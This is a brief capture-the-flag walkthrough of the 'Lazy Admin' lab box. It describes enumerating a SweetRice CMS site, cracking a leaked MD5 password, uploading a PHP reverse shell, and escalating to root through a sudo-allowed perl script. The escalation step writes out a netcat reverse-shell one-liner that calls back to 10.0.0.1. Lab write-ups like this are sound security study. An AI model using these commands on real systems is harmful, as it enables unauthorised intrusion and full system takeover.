Lazy Admin

HTTP Enumeration - SweetRice CMS - Perl binary Abuse

Initial enumeration

• Only two ports were open - 22 and 80

• Enumerating port 80 gives us an endpoint /content - It automatically appends a slash in front of it, which means we'll have to enumerate even for more endpoints

• Enumerating more gives us /content/as - a login page

• Enumerating the /content/inc - leaks the sensitive information and the interesting one was the mysql_database_backup.sql

• It was basically a text file which had few usernames and a md5 hash

• Decrypting that md5 hash - Password123

Exploitation

• Exploring SweetRice CMS gave us an upload functionality under theme section - which can be later accessed by the /_themes directory

• Upload a php reverse shell and trigger it, using the themes endpoint - get a shell

Privilege Escalation

• Executing the sudo lists command using sudo -l gave us

(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

• So the above phrase means - that the perl binary is running as root and it is only allowed to exec the backup.pl file as a root user, so now how do we abuse it? in order to get a root shell?

• Let's cat out the /home/itguy/backup.pl file

#!/usr/bin/perl
system("sh","/etc/copy.sh")

• Why don't we just modify the /etc/copy.sh file into our reverse shell ?

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f' > /etc/copy.sh

• Grab the root.txt :)